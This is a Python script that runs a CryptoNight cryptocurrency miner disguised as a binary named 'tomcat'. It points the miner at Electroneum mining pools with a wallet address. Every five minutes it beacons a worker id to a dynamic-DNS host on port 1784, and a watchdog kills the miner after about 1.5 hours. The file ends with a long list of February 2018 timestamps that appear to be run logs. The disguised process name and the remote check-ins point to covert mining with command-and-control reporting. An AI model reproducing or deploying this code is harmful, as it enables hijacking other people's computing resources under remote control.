import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:10:07.413203
#2018-02-17 15:57:01.923566
#2018-02-17 17:43:07.938579
#2018-02-17 19:29:06.746079
#2018-02-17 21:18:06.210447
#2018-02-17 23:02:03.949496
#2018-02-18 00:49:01.532315
#2018-02-18 02:36:04.791717
#2018-02-18 04:23:01.336134
#2018-02-18 06:13:05.717707
#2018-02-18 08:02:07.481141
#2018-02-18 09:50:06.196363
#2018-02-18 11:39:01.908612
#2018-02-18 13:25:03.169982
#2018-02-18 15:15:05.444302
#2018-02-18 17:04:04.833030
#2018-02-18 18:50:06.623016
#2018-02-18 20:37:07.337254
#2018-02-18 22:22:05.573967
#2018-02-19 00:11:01.376275
#2018-02-19 01:56:04.999643
#2018-02-19 03:43:04.189173
#2018-02-19 05:28:06.735495
#2018-02-19 07:15:08.260573
#2018-02-19 09:05:06.044013
#2018-02-19 10:53:01.972209
#2018-02-19 12:41:05.503368
#2018-02-19 14:28:06.256546
#2018-02-19 16:18:05.583932
#2018-02-19 18:05:08.061550
#2018-02-19 19:52:08.067864
#2018-02-19 21:39:05.920640
#2018-02-19 23:25:06.002378
#2018-02-20 01:10:09.699213
#2018-02-20 03:01:01.842247
#2018-02-20 04:47:07.189337
#2018-02-20 06:31:07.514108
#2018-02-20 08:17:06.423370
#2018-02-20 10:02:07.261020
#2018-02-20 11:48:01.735771
#2018-02-20 13:36:02.014088
#2018-02-20 15:19:06.947736
#2018-02-20 17:04:11.817149
#2018-02-20 18:51:07.967344
#2018-02-20 20:42:04.542642
#2018-02-20 22:27:05.424801
#2018-02-21 00:08:01.990111
#2018-02-21 01:56:04.831120
#2018-02-21 03:44:06.459229
#2018-02-21 05:33:06.374142
#2018-02-21 07:21:06.112223
#2018-02-21 09:06:07.578291
#2018-02-21 10:55:07.132900
#2018-02-21 12:42:12.134944
#2018-02-21 14:29:04.108721
#2018-02-21 16:17:08.842518
#2018-02-21 18:06:04.311911
#2018-02-21 19:54:01.952609
#2018-02-21 21:43:04.030114
#2018-02-21 23:31:01.644431
#2018-02-22 01:18:05.632157
#2018-02-22 03:06:05.841133
#2018-02-22 04:50:08.772533
#2018-02-22 06:37:06.798057
#2018-02-22 08:24:07.321733
#2018-02-22 10:12:01.899971
#2018-02-22 11:56:01.383319
#2018-02-22 13:43:01.660881
#2018-02-22 15:30:05.421463
#2018-02-22 17:16:09.475206
#2018-02-22 19:03:04.504029
#2018-02-22 20:54:05.972326
#2018-02-22 22:41:04.412685
#2018-02-23 00:27:08.283536
#2018-02-23 02:15:07.695321
#2018-02-23 04:01:05.314267
#2018-02-23 05:49:01.955914
#2018-02-23 07:38:07.196010
#2018-02-23 09:41:05.314943
#2018-02-23 11:46:08.511676
#2018-02-23 13:37:07.171685
#2018-02-23 15:24:05.819878
#2018-02-23 17:11:06.913673
#2018-02-23 18:56:05.937775
#2018-02-23 20:42:01.687872
#2018-02-23 22:28:01.260873
#2018-02-24 00:13:08.712314
#2018-02-24 02:04:07.048194
#2018-02-24 03:38:05.118059
#2018-02-24 05:11:05.764775
#2018-02-24 06:48:07.672520
#2018-02-24 08:22:01.546701
#2018-02-24 09:50:08.804124
#2018-02-24 11:35:02.080349
#2018-02-24 13:02:04.007793
#2018-02-24 14:34:07.462996
#2018-02-24 16:06:06.630613
#2018-02-24 17:38:03.935901
#2018-02-24 19:13:01.569178
#2018-02-24 20:46:01.897975
#2018-02-24 22:31:05.575944
#2018-02-25 01:03:04.184024
#2018-02-25 04:45:07.452604
#2018-02-25 08:56:01.969917